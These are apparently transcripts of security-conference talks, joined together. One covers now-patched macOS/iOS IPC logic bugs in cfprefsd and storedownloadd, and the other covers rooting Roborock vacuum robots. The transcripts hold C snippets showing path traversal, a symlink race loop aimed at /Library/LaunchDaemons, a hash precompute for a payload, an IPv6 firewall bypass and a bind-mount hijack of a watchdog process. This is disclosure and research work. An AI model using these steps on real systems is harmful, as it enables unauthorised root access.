Apps can also use many of the underlying Core Foundation APIs. For example, CFPreferencesSetAppValue and CFPreferencesCopyAppValue can be used to set or get the preferences data. After reverse engineering cfprefsd, we found it creates the XPC service named com.apple.cfprefsd.daemon, which runs with root privilege and without a sandbox. When a client sends a request to cfprefsd, the event handler is scheduled to handle the request. As a foundational service, preferences can be accessed from almost everywhere. Even the most restricted process needs to access preferences. Here is the sandbox profile for the Safari WebContent process: it allows the sandboxed process to access com.apple.cfprefsd.daemon. Because cfprefsd is an XPC service, we can also talk to it by sending XPC messages directly. That is a low-level method that lets us control the operation more precisely. Here is a sample request. First we use xpc_connection_create_mach_service to create a service connection. Then we create the XPC dictionary and set the keys and values that control the operation. Finally, we send the XPC message through the xpc_connection_send_message API. Where does cfprefsd save the preferences data? The preferences file path is constructed from multiple components. Part of it is a fixed value inside cfprefsd; parts of it come from the client through the XPC message. First, let's look at the preferences directory where the preferences file is stored. There are some predefined locations to store the file. The preferences domain is the value that is passed in through the domain key of the XPC message. By default, the file path is composed of the preferences directory, the preferences domain and the .plist suffix. How is the file path constructed? There are two main steps. First, it formats the file path with CFStringCreateWithFormat, which concatenates the preferences domain with .plist. Then it uses CFURLCreateWithFileSystemPathRelativeToBase to generate the full path. The base URL is the preferences directory and the file path is the path returned above. Logic vulnerabilities always combine several features, and we found that CFURLCreateWithFileSystemPathRelativeToBase has two features that may be abused. First, this function has a path traversal feature: if the file path contains ../, the returned file path can traverse to any path we want. The second feature is that if the file path is an absolute path, it will return that file path no matter what the base URL is. We can use the path traversal feature or the absolute path feature to control the preferences file path and make it point to any file path we want. What if the controlled file path does not exist on the file system? The function named cacheActualPathCreatingIfNecessary is very interesting. As the name suggests, it will create the file path if it does not exist. First it will try to open the file; if the file path exists, it will return the path. If the file path does not exist, it will take the directory part of the file path and create the directory. After creating the directory, it tries to open the file path again and then returns the file path. CFPrefsCreatePreferencesDirectory is the function used to create the non-existent directories. It first splits the path into multiple sub-components by slash and then creates them recursively with mkdirat. After a directory is created, its ownership is modified through a chown call. But where do the user ID and group ID come from? The owner of the newly created directories is determined by several factors.
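The two CFURL behaviors that the bug chain relies on are easy to observe directly. Here is a small CoreFoundation snippet of my own (compile with -framework CoreFoundation); the base directory /Library/Preferences is only an assumption for the demo. It shows that a ../ path escapes the base directory and that an absolute path ignores the base URL entirely.

    #include <CoreFoundation/CoreFoundation.h>

    static void show(CFStringRef label, CFStringRef path, CFURLRef base) {
        CFURLRef url = CFURLCreateWithFileSystemPathRelativeToBase(
            NULL, path, kCFURLPOSIXPathStyle, false, base);
        CFURLRef abs = CFURLCopyAbsoluteURL(url);
        CFShow(label);
        CFShow(CFURLGetString(abs));   // print the location cfprefsd would end up using
        CFRelease(abs);
        CFRelease(url);
    }

    int main(void) {
        // Assumption for the demo: the "preferences directory" is /Library/Preferences.
        CFURLRef base = CFURLCreateWithFileSystemPath(
            NULL, CFSTR("/Library/Preferences"), kCFURLPOSIXPathStyle, true);

        // 1) Path traversal: ../ lets the resulting location escape the base directory.
        show(CFSTR("traversal:"), CFSTR("../../private/tmp/evil.plist"), base);

        // 2) Absolute path: the base URL is ignored entirely.
        show(CFSTR("absolute:"), CFSTR("/private/tmp/evil.plist"), base);

        CFRelease(base);
        return 0;
    }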
By default, the owner is the identity of the XPC client, and cfprefsd gets the identity of the client user through XPCConnectionGetEffectiveUserID and XPCConnectionGetEffectiveGroupID. However, the XPC client can also specify the expected user. Therefore, the ownership of the newly created directory is also under our control. We can let cfprefsd help us create any directory with a controlled owner. There are many ways to convert arbitrary directory creation into code execution with root privilege. Here we share a method mentioned by Csaba Fitzl using periodic scripts. Periodic scripts are a mechanism to schedule script execution. The daily directory does not exist by default, but the operating system will periodically scan it and execute the files in it. By exploiting the vulnerability, we can create the daily directory and set the owner of the directory to the current user. Then we can write any script into the daily directory. Wait a day and the script will execute with root privilege. The patch for the vulnerability is simple and straightforward; it can be explained just by looking at the function name. The cacheActualPathCreatingIfNecessary function has been replaced with cacheFileInfoForWriting. There is no creating anymore. In fact, cfprefsd will no longer help the user create a non-existing preferences directory. If the client passes in a directory which does not exist, cfprefsd will ask the client to create it. How does cfprefsd read the preferences data? When a client wants to get the data, the client needs to send a request to cfprefsd. By default, it will read the data and return it in the reply directly. But if the size of the file is too large to fit in an XPC message, it will just return a file descriptor. To avoid subsequent changes to the file, it will clone a copy before returning the file descriptor. This function is cfprefsd's implementation for processing large preferences files. First, it gets the file path, then it determines whether the file size exceeds 1 MB. Then it generates a random temporary file path according to a rule and clones the original file to the temporary file. Finally it opens the temporary file and returns its file descriptor. It calls clonefile to clone the file to a temporary file with a random name. The temporary file and the original file are in the same directory. The path of the temporary file is generated by mktemp according to a template. The template is the file path spliced together with .cfp and seven random characters, so the final temporary file name is random. But is it guaranteed to be random? mktemp will replace the seven X's at the end of the template with random characters, and the space of random characters is very large. Is there any way to make mktemp generate a fixed file name? One key point is that snprintf specifies a maximum length of 0x400 when generating the template. If the plist path is very long, what happens if the spliced template exceeds 0x400? snprintf will truncate, and the characters exceeding 0x400 will not be written into the buffer. To be more precise, if the length of the file path plus the .cfp string is exactly 0x400-1, the template generated by snprintf will not contain any X's at the end, and mktemp will generate a fixed temporary file path. Before clonefile is called, there is a file check. In the exploit code, we can first pass in a normal file path. This ensures that cfprefsd successfully passes this check and enters the subsequent clonefile process.
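The truncation trick is plain C behavior and can be reproduced in isolation. In the sketch below, the ".cfp_XXXXXXX" template format is an assumption (the talk does not spell out cfprefsd's exact format string); the point is only that snprintf silently drops everything past 0x400-1 bytes, leaving a template with no X's for mktemp-style expansion.

    #include <stdio.h>
    #include <string.h>

    int main(void) {
        // A fake, very long plist path: length chosen so that "<path>.cfp_" is exactly
        // 0x400-1 bytes, leaving no room for the trailing X's in a 0x400-byte buffer.
        char longpath[0x500];
        memset(longpath, 'A', sizeof(longpath));
        longpath[0x400 - 1 - strlen(".cfp_")] = '\0';

        char template_[0x400];
        // Hypothetical template format -- the real one inside cfprefsd may differ.
        int wanted = snprintf(template_, sizeof(template_), "%s.cfp_XXXXXXX", longpath);

        printf("wanted length: %d, stored length: %zu\n", wanted, strlen(template_));
        printf("last 8 chars:  \"%s\"\n", template_ + strlen(template_) - 8);
        // The stored string ends in ".cfp_" with no X's left, so a mktemp()-style
        // template expansion has nothing random to fill in -- the name becomes fixed.
        return 0;
    }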
After the file check, and before the clonefile, there is a window for a race condition. If we replace the controllable file with a symbolic link during this time, cfprefsd will call clonefile to help us copy an arbitrary file to the temporary file path we control. We got a fixed temporary file name, but can we link it to another place ahead of the mktemp function? No, this file name is guaranteed not to exist at the time of the function invocation. But after mktemp returns successfully and before the clonefile, there is also a window for a race condition. We can replace the temporary file with a symbolic link. In this way, we can achieve arbitrary file write. In the patch, Apple added a truncation check, and the subsequent clonefile will not be executed if truncation occurs. The previous method of forcing a fixed file name no longer works. How does cfprefsd write preferences data? When cfprefsd saves preferences data for the client, it first extracts the key and value from the XPC message, then it reads the original data from the target file, generates new data based on the incoming key and value, writes the new data to a temporary file, and then renames the temporary file back to the target file. When saving data, cfprefsd verifies that the client has write permission to the target file: the client needs to pass in a file descriptor with write permission. After the previous check, cfprefsd generates a temporary file and writes the data to it. Then it renames this temporary file back to the target file. Can a normal user replace the source file of the rename with a symbolic link? No, this temporary file is in a root-owned directory, and a normal user does not have permission to write to this directory. Can a normal user replace the rename target with a symbolic link? A normal user has write permission for the target, but the target file will be deleted first when rename is called, so even if it can be replaced with a symbolic link, it will not work. Regarding this feature, the rename API documentation says: if the final component of the target is a symbolic link, the symbolic link is renamed, not the file or directory to which it points. But wait, the documentation says that if the final component of the target is a symbolic link, rename will delete it first. What if it's not the final component? What if a middle component of the plist path is a symbolic link? Suppose the path of the preferences file is /tmp/test/hello.plist. If we replace the test directory with a symbolic link pointing to the LaunchDaemons directory, then hello.plist is used as the target path of the rename. What will happen? The symbolic link will be followed, and the temporary file will be moved into the LaunchDaemons directory. Before renaming the temporary file, cfprefsd verifies that the caller has write permission. However, after the file check and before the rename function, there is a time window to replace the middle component of the file path with a symbolic link. When renaming the file, it will move the temporary file with controllable content to an arbitrary path. The patch for the rename vulnerability is very simple: rename is replaced with renameat. renameat locates the target file relative to a directory descriptor, which ensures that the final move target must be inside a certain directory. So even if we replace the directory with a symbolic link, it will not work anymore. Here is a demo. We used the vulnerabilities to achieve arbitrary file read and write, and then we could gain root privileges on macOS and read private data on iOS.
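As a rough sketch of what the attacker's side of such a race could look like (paths, timings and error handling are illustrative only, and the real exploit is more involved), one could keep flipping the middle path component between a harmless directory, so the permission check passes, and a symlink into /Library/LaunchDaemons, so the later rename follows it:

    #include <sys/stat.h>
    #include <unistd.h>

    int main(void) {
        // Assumption: we own /tmp/test and it is empty; the privileged process repeatedly
        // checks permissions on /tmp/test/hello.plist and then renames its temp file there.
        for (;;) {
            // Benign state: a real, writable directory so the file check succeeds.
            mkdir("/tmp/test", 0777);
            usleep(100);

            // Malicious state: swap the directory for a symlink so the rename
            // lands in /Library/LaunchDaemons instead.
            rmdir("/tmp/test");
            symlink("/Library/LaunchDaemons", "/tmp/test");
            usleep(100);

            // Remove the symlink again before the next iteration's permission check.
            unlink("/tmp/test");
        }
        return 0;
    }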
First, we used the preferences vulnerabilities to achieve root privilege. You can see that System Integrity Protection is enabled and the current user is a normal user, not root. We could get root privileges very quickly. Next, we used the preferences vulnerabilities to read private data on iOS. You can see our demo application is not allowed to access photos and contacts. However, if we take a photo and then open the demo application, our demo application can steal the photo and send it to our server. Thank you. Last year, we found and reported an interesting logic vulnerability in the macOS App Store component. An application could abuse it to gain elevated privileges. The vulnerability exists in the NSXPC service com.apple.storedownloadd.daemon. The service is implemented in the storedownloadd daemon, which runs with root privilege. Fortunately, this process is running in a sandbox. But unfortunately, as an app download service, it must have the ability to write to some sensitive locations. For example, it is allowed to write to the Applications and Keychains directories. As an NSXPC server, it provides many interfaces for clients. Here we listed the set store client and perform download interfaces. The perform download interface is very interesting: it performs downloading jobs for the client. But what can it download, and what is the SSDownload parameter? For NSXPC, Objective-C objects that implement the NSSecureCoding protocol can be used as parameters, and SSDownload is such an object. This object has only one property, assets, which is an array. The elements in the assets array are SSDownloadAsset objects. SSDownloadAsset is also an Objective-C object and it has three properties: the URL, the download path, and the hashes. The SSDownloadAsset object is passed from the client to the server. The properties of the SSDownloadAsset are serialized in the client; the encodeWithCoder function is called to serialize the specified properties into the XPC message. At the server side, the XPC message is deserialized with initWithCoder, which constructs the SSDownloadAsset object with the specified properties. The properties of the object are therefore fully controllable. How does storedownloadd perform downloading tasks? It performs the download according to the URL, then it verifies the response contents based on the hashes, and finally it writes the contents to the specified download path. There is a hash verification in the download logic. This function calculates the hash of the response contents and then compares it with the specified hashes. But it's not a security check, just a data integrity verification. Because we can control the download URL, the content hash, and the download path, we can write to an arbitrary file path with storedownloadd's privileges. An attacker could say: hi, storedownloadd, please help me download the file from this URL, its hash is this, and then write the contents to this download path. Thanks. And storedownloadd would do all the jobs for the attacker. How did Apple fix this vulnerability? The issue was addressed by removing the vulnerable code, they said. To be more precise, they completely removed the service: there is no com.apple.storedownloadd.daemon anymore. Here is the demo of the App Store vulnerability. We just downloaded a test.keychain into the Keychains directory with the help of storedownloadd. There are other interesting logic vulnerabilities we describe in our blog: an XPC service implementation flaw, which is a logic bug inside launchd for managing XPC services.
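Since the client supplies both the download URL and the expected hash, the integrity check can always be satisfied by hashing your own payload first. The snippet below is only an illustration of that point; SHA-256 via CommonCrypto is an assumption, as the talk does not say which digest or encoding storedownloadd actually expects.

    #include <CommonCrypto/CommonDigest.h>
    #include <stdio.h>
    #include <string.h>

    int main(void) {
        // The payload we want written to a privileged location (e.g. a crafted plist).
        const char *payload = "my malicious file contents";

        // Hash it ourselves -- whatever digest the service expects, the client is the
        // one supplying it, so the check only proves the download arrived intact.
        unsigned char digest[CC_SHA256_DIGEST_LENGTH];
        CC_SHA256(payload, (CC_LONG)strlen(payload), digest);

        printf("expected hash to hand to the daemon: ");
        for (int i = 0; i < CC_SHA256_DIGEST_LENGTH; i++)
            printf("%02x", digest[i]);
        printf("\n");
        return 0;
    }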
An NSXPC vulnerability in Adobe Acrobat Reader for macOS. There are many security mechanisms on Apple platforms that try to make vulnerabilities harder to exploit, like DEP, ASLR, PAC and so on. But you probably noticed that logic bugs are not affected by these security features. That's just awesome. Logic vulnerabilities have many advantages. Though they are hard to find, they are easy to exploit, and the exploitation is always stable. Logic vulnerabilities often exist across platforms, so one exploit can rule them all. Logic bugs in core frameworks like Preferences let us rule all Apple platforms, Intel and Apple Silicon alike, without changing one line of our exploit. Apple is also working hard to try to reduce the IPC attack surface. For example, by adding more restrictive sandbox rules, it reduced the IPC services accessible to applications. They keep deleting unnecessary high-privileged services, and they are adding more and more private entitlements to make many high-privileged services only accessible to Apple applications. It is hard to make sure everything is perfectly secure, so Apple is also trying to limit the damage. For example, they are putting IPC services in sandboxes and giving them the least privilege, and they are using rootless to limit the root privilege. In this presentation, we talked about the latest IPC mechanisms on Apple platforms, XPC and NSXPC. We walked you through some interesting IPC logic vulnerabilities: three logic vulnerabilities in Preferences and one in the App Store. We detailed the design logic and implementation of these components, the flaws inside them, and how we exploited them to elevate privilege. We also talked about the advantages of IPC logic vulnerabilities and the state of Apple IPC security. Logic bugs are always fun to hunt for; we think you will love it just as we do. We would like to thank Csaba Fitzl, Ian Beer and G-Gel for their previous work and shares.
|
Apple's iOS, macOS and other OS have existed for a long time. There are numerous interesting logic bugs hidden for many years. We demonstrated the world's first public 0day exploit running natively on Apple M1 on a MacBook Air (M1, 2020). Without any modification, we exploited an iPhone 12 Pro with the same bug. In this talk, we will show you the advantage and beauty of the IPC logic bugs, how we rule all Apple platforms, Intel and Apple Silicon alike, even with all the latest hardware mitigations enabled, without changing one line of code. We would talk about the security features introduced by Apple M1, like Pointer Authentication Code (PAC), System Integrity, and Data Protection. How did they make exploiting much harder to provide better security and protect user's privacy. We will talk about different IPC mechanisms like Mach Message, XPC, and NSXPC. They are widely used on Apple platforms which could be abused to break the well designed security boundaries. We will walk you through some incredibly fun logic bugs we have discovered, share the stories behind them and methods of finding them, and also talk about how to exploit these logic bugs to achieve privilege escalation. REFERENCES: https://www.youtube.com/watch?v=Kh6sEcdGruU https://support.apple.com/en-us/HT211931 https://support.apple.com/en-us/HT211850 https://support.apple.com/en-us/HT212011 https://support.apple.com/en-us/HT212317 https://helpx.adobe.com/security/products/acrobat/apsb20-24.html https://helpx.adobe.com/security/products/acrobat/apsb20-48.html https://helpx.adobe.com/security/products/acrobat/apsb20-67.html
|
10.5446/54186 (DOI)
|
Hi, I am Dennis Giese and welcome to my talk about robots with lasers and cameras but no security, where we will talk about ways you can liberate your vacuum from the cloud. Before we start, here is some background information about me. I am a PhD student at Northeastern University and I am working with Professor Guevara Noubir. Our research field is wireless and embedded security. My particular interest is in the reverse engineering of interesting devices. I focus on smart home devices, mostly vacuum cleaning robots. My current research is on the security and privacy of smart home speakers. In our most recent work, we analyzed the security and privacy of used Amazon Echo devices. This paper was published at ACM WiSec this year. Let's talk about the goals of this talk. First, I would like to give you an overview of the current development and rooting of vacuum cleaning robots. In particular, we will focus on Roborock and Dreame. We will talk about vulnerabilities and backdoors, and I will explain new methods which you can use to root your device. As a general side note, I have no intention of bashing the companies. I like the products and I think we have maintained a very friendly relationship. However, obviously our goals are slightly different. All right, let's talk about our motivation. So, why do we want to root devices? Well, these devices have powerful hardware and a lot of sensors, so we can play around with interesting hardware. This is especially interesting for people in education. Then we want to stop devices from constantly phoning home. Also, a lot of people already have custom smart home services running, for example Home Assistant, and here it is interesting to connect the vacuum cleaners to that system. And finally, we want to verify the privacy claims of the manufacturers. So, why don't we trust IoT? Well, IoT devices in general are always connected to the internet and they are on your home network. The cloud communication is encrypted and you don't really know what kind of data is transmitted. From our experience, we know that developing secure hardware and software is hard and that IoT devices are not always being patched. Also, vendors sometimes contradict each other in regards to their privacy claims, and as an end user, you have no way to be sure. All right, here's an example. Roborock claims for their flagship model that nothing is sent to the cloud, especially nothing that is recorded by the camera. This claim was also certified by the German TÜV. However, on the same website, they show that you can access the camera remotely from your phone, for example to watch your pets and talk to them. Let's talk about the problem of used devices. A lot of people order devices on Amazon, try them and return them. So, used devices are not that rare. As a buyer, you have no real information about the past of the device. A malicious person could have installed a rootkit onto it. As a new owner, you have no way to verify the software and as a result, you might have a malicious device in your home network. So, rooting is the only way for you to verify that the device is in fact clean. All right, let's take a look into the past, the good old times of rooting. My first work with vacuum cleaning robots was back in 2017. Here, I worked with Daniel Wegemer and we were looking at the Xiaomi vacuum cleaning robot and the Roborock S5.
We figured out that the firmware images of these devices were unsigned and encrypted with a very weak key and that custom firmware could be pushed from the local network. As a result, it was possible to root the devices without disassembly and to develop custom software and voice packages for them. We published our findings at 34C3 back in 2017 and also at DEF CON exactly three years ago. Here, I would like to give you a short recap of the hardware of the Xiaomi vacuum robot and the S5. Both robots run an ARM quad-core CPU and have 512 megabytes of RAM. They also have 4 gigabytes of eMMC flash. They have a lot of sensors; the most important ones are the LiDAR sensor on the top of the robot, the infrared sensors and the ultrasonic sensor. These devices also have some debug ports, for example USB and UART. However, USB was kind of protected and we never used it for anything. To give you some background information about the software, these devices run Ubuntu 14.04, mostly untouched; however, the vendor obviously changed the root password. Interestingly, the vacuum cleaners are controlled by the Player software, which is basically an open source robot device interface and server. So they used open source software to run the devices. There is also a lot of proprietary software on them. For example, they use a custom ADB version which has some authentication, so we couldn't really use it. They run a custom watchdog, which makes sure that the device doesn't crash, but on the other side also enforces copy protection, and they have a logging tool which uploads a lot of data to the cloud. They protected the ports on the device with iptables. For example, they blocked port 22 for SSH and also blocked the Player ports. However, the interesting thing was that the iptables rules only apply to IP version 4. So if the device got an IPv6 address, it would not be firewalled at all. All right, let's look at how the vendors fought back and how they started to lock down devices. Well, the first steps in locking down we saw with newer S5 firmware. Here, Roborock blocked local firmware updates. Apparently, this change was also pushed to other IoT devices from Xiaomi, so most devices were basically blocking local firmware updates. We saw more changes with the introduction of the Roborock S6, which came out in 2019. For example, the firmware and the voice packages were now signed, so we were not able to create our own custom voice packages anymore. Each model also used different encryption keys. So if we had the encryption keys for one model, we were not able to decrypt firmware for a different model. They also started to sign the configuration files to enforce region locks, as many people bought cheap devices from China and modified them so that they could be used outside of Mainland China. One interesting aspect is that most of the hardware remained mostly the same, so most of the changes were basically just done in software. All these changes meant that in order to get root access on the device, we needed to disassemble it. One thing which we thought back then, when this device came out, was that we might need to keep rooting methods secret. And so in the first two weeks after I got the Roborock S6, I was able to root it and then developed two different methods. One where I extracted the root password via UART and deobfuscated it so I could get access over serial, for example.
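To illustrate the IPv4-only firewall issue, here is a small sketch of my own (not from the talk) that forces a TCP connection over IPv6 to the SSH port; the target address is just a placeholder for whatever IPv6 address the robot obtained.

    #include <netdb.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/socket.h>
    #include <unistd.h>

    int main(int argc, char **argv) {
        // Assumption: the robot's IPv6 address is passed as argv[1]; port 22 is only
        // blocked by the IPv4 iptables rules, so over IPv6 it should be reachable.
        const char *host = (argc > 1) ? argv[1] : "::1";
        struct addrinfo hints, *res;
        memset(&hints, 0, sizeof(hints));
        hints.ai_family = AF_INET6;        // force IPv6 so the IPv4 filter never sees us
        hints.ai_socktype = SOCK_STREAM;

        int rc = getaddrinfo(host, "22", &hints, &res);
        if (rc != 0) { fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(rc)); return 1; }

        int fd = socket(res->ai_family, res->ai_socktype, res->ai_protocol);
        if (fd >= 0 && connect(fd, res->ai_addr, res->ai_addrlen) == 0)
            printf("port 22 reachable over IPv6 -- the IPv4 firewall did not apply\n");
        else
            perror("connect");
        if (fd >= 0) close(fd);
        freeaddrinfo(res);
        return 0;
    }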
And the other way was that I booted into single user mode and modified files there so that I had SSH access. Back then, I didn't publish the methods for some time, as I assumed that Roborock would lock them down as soon as they knew about them. So this is what you had to do to get root access: you basically had to solder wires to the test pads to get to the UART port. With rooting, we made some observations over time. Every time we published a method, it got blocked. And here are some examples of blocking. For example, local updates, which we published in 2017, were blocked in firmware updates in 2018. The root password method which I published in 2019 was blocked in newly produced devices back in 2019. And the U-Boot bypass was fixed for new models in 2020; there was one model which came out at this time and it was already patched. This means basically that all current public methods are blocked. All right. Let's talk about the development of Roborock models over time. We will only talk about global models. There are way more models in Mainland China, but in this case, I just want to talk about global models. On the left side, you see the size of the RAM. On the right side, you see the size of the flash. And this becomes more important later. In 2016, Xiaomi released the V1, which was basically an OEM product by Roborock. Roborock released the S5 under their own name in 2017. In 2019, we saw more devices like the Roborock S6 and SXPU, and the Xiaomi M1S which was again an OEM product. In 2020, we saw the S4, S4 Max and S5 Max and their flagship model, the S6 MaxV. And this year, we saw the Roborock S7. If you add the price, then you see that higher prices do not really correlate with better hardware. Also, one thing which we noticed is that manufacturers are recycling hardware in different models. For example, the Xiaomi vacuum robot has more or less the same hardware as the Roborock S4. The Roborock S5 and the Roborock S6 are more or less the same. And as you can see at the bottom, the S6 Pure, the S4 Max, the S5 Max and the S7 have the same mainboard and more or less the same hardware too. However, the prices are very different between them. As a conclusion, one thing which we noticed is that the hardware gets weaker over time despite the devices getting more expensive. Roborock has two vacuum cleaners which are special. Both of them contain a camera, which is a little bit more critical in regards to privacy. The first one is the M1S, which was released in 2019. Instead of using an Allwinner chip, this one uses a Rockchip quad-core SoC. It has 512 megabytes of RAM and 4 gigabytes of eMMC. It has a LiDAR sensor, which we already know from other models, but in addition to that it also has an upward-facing black and white camera. It does have an ultrasonic distance sensor in the front and infrared sensors. To give you a perspective of the camera, I recorded this video on a rooted vacuum cleaner. The second model with a camera is the Roborock S6 MaxV. This is currently the flagship model. It was released in 2020 and contains a Qualcomm octa-core SoC. It has 1 gigabyte of RAM and 4 gigabytes of eMMC flash. In addition to the LiDAR, it also has two color cameras in the front which are illuminated with infrared, and it has the usual infrared sensors. At the bottom left you can see the stereo camera of the device. At the bottom it has the infrared illumination, so this device can see in the dark. On the right you find screenshots from the app.
As you can see, the vacuum cleaner can actually detect objects and avoid them. This is also quite interesting again for privacy reasons. If you look at the software of both devices, both of them are very similar. They use Android as the operating system and the controlling software for the robot is very similar to the previous models. The software accesses the cameras via the Video4Linux subsystem. There are a lot of libraries which are used, but the more interesting ones are OpenCV, OpenCL and TensorFlow Lite. Roborock learned from the past and added a lot of security measures to these devices. For example, Secure Boot is enabled and they make use of the replay protected memory block (RPMB) as downgrade protection. The system partition is integrity protected with dm-verity, so we cannot modify it. Also, a lot of partitions are encrypted with LUKS. In particular, all the application-specific programs are stored on an encrypted partition. The keys for this partition are stored in OP-TEE, which uses ARM TrustZone. But there are more security features. For example, Roborock added a kernel-based verification of binaries. All binaries are checked for a correct signature before they get executed. This means we cannot really put any custom binaries onto the system. Also, they signed and encrypted the firmware updates. This time each of the firmware versions has a different key. The master keys themselves are stored in OP-TEE using TrustZone. Interestingly, they modified the iptables binary. Traditionally, what we did for rooting was remove all the firewall rules as soon as we rooted the device so we could access SSH and other tools. However, Roborock removed the ability of iptables to flush or delete rules, so as soon as rules are added to iptables we cannot remove them anymore. They also locked UART, so we cannot use UART to get root access. There are some partitions which are especially interesting on these devices and which we also need later for our root. There's the app partition, which contains the device credentials and some other configuration files. This partition is not protected by LUKS or dm-verity. Then we have two copies of the system partition: one of them is the active one, one of them is the passive one. Both partitions are protected with dm-verity, so we cannot modify them. Then we have two application partitions, again one active and one passive copy, which are encrypted with LUKS but not integrity protected. We have a reserve partition which contains the calibration data; this one is again encrypted. And we have the user data partition, which contains log files and the maps and is again encrypted with LUKS. So let's talk about the new rooting methods for Roborock. Currently there are three models of vacuum cleaners which have no public root. These are the Roborock S7, which came out this year, the M1S and the MaxV. Let's start with the Roborock S7. The Roborock S7 has more or less the same mainboard as the S5 Max, S6 Pure, etc. However, the problem is that they patched U-Boot, so we cannot use UART anymore to root it. In addition to that, the rootfs is a read-only SquashFS, so even if we have access on the device we cannot modify the partition. I developed a new method for this device, which is FEL rooting. This method doesn't require any soldering; however, it still requires that the device is disassembled. This method also automatically patches the rootfs and enables SSH, and it applies to all current NAND-based Roborock models.
In order to find a new rooting method we need to reverse engineer the PCB. We knew already where the UART pins were, but they are useless after Roborock blocked this functionality. However, all the Allwinner SoCs have the so-called FEL mode. FEL mode is a low-level mode which allows flashing of the device, and it is burned into the SoC's boot ROM, so it cannot be modified. The idea is to load a custom OS via FEL. There are two typical methods to trigger FEL mode. First, we can somehow disable the flash chip, for example by grounding the clock. However, this method might be risky if you don't do it correctly. And the second one is that we can pull the boot mode pin or trigger the FEL pin. The problem with this is we need to figure out where this pin is. So I got myself a spare PCB and destructively desoldered the SoC. After I did that, I probed all the pins and was able to find the interesting pins, for example JTAG or the boot mode selection. And by having this, we can use it to trigger FEL mode. So how does this approach actually work? The challenge with Allwinner SoCs is that the NAND support is proprietary, so we cannot use a mainline kernel or mainline U-Boot. So my approach was the following. I extracted a kernel configuration from a Roborock kernel. I created my own initramfs with Dropbear, SSH keys and some tools. I compiled a minimal kernel using the Nintendo NES Classic sources; the Nintendo NES Classic uses the same chip as the Roborock vacuums. I created my custom U-Boot version with an extracted Roborock configuration, and I triggered FEL mode by pulling TPS17, which is the boot selection pin, to ground. Then I loaded U-Boot, the kernel and the initramfs into RAM and executed them. After I did that, my custom OS booted, automatically patched the rootfs, and I had root. What does the patching process look like exactly? First we boot into the FEL image, then we decompress the SquashFS. After that we patch this image, for example we install the authorized_keys file and a custom Dropbear server, we compress the image again and overwrite the partition with the new image. And as a result we have SSH access and root. So what are the advantages of this new method? Well, first we don't need any soldering anymore; you just have to short the boot pin once and you're good to go. It's a very simple process and it also allows restoring bricked devices, which was not possible before. And also one important thing is that it can be used for all Allwinner-based vacuum cleaners. So now that we have root for the Roborock S7, let's take a look at the camera-based models. If we want to root the M1S and the MaxV we have some issues. First, all the ports are closed or firewalled. The file systems are encrypted or integrity protected, and the USB interface is also protected with a custom ADBD. So to get root access we need a layered approach. First we need to break in via USB. Then we need to disable SELinux and then patch the application partition. And as an important note: while it might be possible to root these devices, it might be impossible for many people. So don't expect it to be as easy as for previous models. All right, level one: get an ADB shell. If we connect over USB we need to do a challenge-response authentication. This authentication is based on a vinda secret which we don't have. Roborock probably has it somewhere in a database. The secret is also device specific.
Also, ADB is controlled via a special configuration file which we might need to modify. All these files are stored on the default partition and are thankfully not protected. So our idea is as follows. First we need to connect to the flash, for example via in-system programming or by desoldering it. Then we need to create or extract the vinda secret, and then we use a tool to compute the challenge response. For the M1S we can do in-system programming by soldering small wires to the bottom side of the PCB. The pictures which you see here are from my experiments where I used an SD card as a replacement for the eMMC flash, but the pinout is more or less the same. An important warning: if you don't know what you're doing, you will likely break your device. So I tried both methods, but I figured out ISP can sometimes be tricky. So what I did instead is I used an adapter to read out the chip, which requires reflow soldering to remove the chip, reballing it and then resoldering it again. Okay, what are the results of level one? I have a more detailed how-to on my website. What I did here is I set the vinda secret to a known value. After I connected the device via USB, I needed to extract the serial number from it, so I ran adb devices. The serial number is required for the challenge-response process. In the next step I asked the device for a challenge. As you see here, I got a random string back, which is the challenge. In the next step I used the Vindar tool to generate a response. At this point I want to thank Eric Ullman for his support and help in creating this tool. Before that I was computing the response manually, but he extracted the function in Ghidra and just put it into a C program, so now we can just run it from the shell. The result of this program is basically the response, and as soon as we have that, we can run any commands we want, as you see here. We now have shell access, but SELinux is still enforced. SELinux will prevent us from doing specific things even if we are root. For example, network access is blocked and we don't have any access to the dev directory, so we cannot mount partitions or access devices. However, we can do two things: we can do bind mounts and we can issue the kill command. So the idea to disable SELinux is as follows. First we copy the miio directory to a temporary location. The miio directory contains the Xiaomi cloud client, which is launched by the watchdog. The watchdog has all privileges and it makes sure that if the miio client crashes it gets restarted. In the next step we replace the miio client with a bash script which disables SELinux. In the next step we bind mount this temporary location back to the original location. If we now kill the miio client, the watchdog will restart our bash script instead of the real miio client, and hopefully SELinux gets disabled. Let's take a look if this also works in practice. First we need to verify that SELinux is actually enabled. With the getenforce command we get the response that it's enforcing. In the next step we check the process ID of the miio client process, and we see the original process is running. Now we copy the miio folder to a temporary location and write our bash script over the client. The client is not an ELF binary anymore; instead it's a bash script. Now we bind mount this folder to the original location and we kill the miio client.
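The two primitives that make this work, a bind mount and a kill, are ordinary system calls. A hypothetical C sketch of that final step might look like the one below; the directory paths and the PID handling are placeholders, since the real locations and process names come from the device's firmware.

    #include <signal.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/mount.h>
    #include <sys/types.h>

    int main(int argc, char **argv) {
        // Hypothetical paths for illustration only -- the real directory differs per firmware.
        const char *prepared = "/data/tmp/miio";   // copy of the vendor dir with our script inside
        const char *original = "/opt/miio";        // location the watchdog launches the client from
        pid_t client_pid = (argc > 1) ? (pid_t)atoi(argv[1]) : 0;

        // Bind-mount our prepared copy over the original directory.
        if (mount(prepared, original, NULL, MS_BIND, NULL) != 0) {
            perror("mount");
            return 1;
        }

        // Kill the running client; the privileged watchdog restarts it and thereby
        // executes our replacement script instead of the real binary.
        if (client_pid > 0 && kill(client_pid, SIGKILL) != 0)
            perror("kill");

        return 0;
    }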
